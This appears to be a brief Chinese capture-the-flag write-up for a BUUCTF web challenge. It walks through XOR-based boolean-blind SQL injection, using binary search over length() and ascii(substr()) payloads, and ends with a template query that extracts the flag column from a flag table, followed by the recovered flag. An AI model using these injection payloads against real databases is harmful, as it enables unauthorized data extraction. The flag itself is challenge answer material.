buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
1.根据提示,说明flag
在表里
2.那就猜测存在sql
注入,反手测试一波id=1'
3.尝试使用1'--+
进行注释
4.直接丢进salmap
里吧,不出意外多半是跑不出来
5.直接放入fuzz
里进行测试
6.发现当我们使用异或时,出现了提示
Hello, glzjin wants a girlfriend.
7.那我们就按照这个思路进行注入
异或异或,相同为0
,不同为1
8.判断数据库的长度
0^(length(database())>0)
0^(length(database())>16)
9.使用折半查找的方式进行测试
0^(length(database())>13)
0^(length(database())>10)
0^(length(database())>11)
10.说明数据库的长度为11
0^(length(database())=11)
12.判断数据库名
0^(ascii(substr(database(),1,1))>80)
0^(ascii(substr(database(),1,1))>100)
0^(ascii(substr(database(),1,1))>90)
0^(ascii(substr(database(),1,1))>95)
0^(ascii(substr(database(),1,1))>97)
0^(ascii(substr(database(),1,1))>98)
0^(ascii(substr(database(),1,1))>99)
id=0^(ascii(substr(database(),1,1))=99)
中间的折磨了好久想爆破数据库的表名,走啦好多的弯路,可以直接出来的
0^(ascii(substr((select(flag)from(flag)),{},1))>{})
flag{bcc3af9d-a5ee-4395-a540-ffb516eaba15}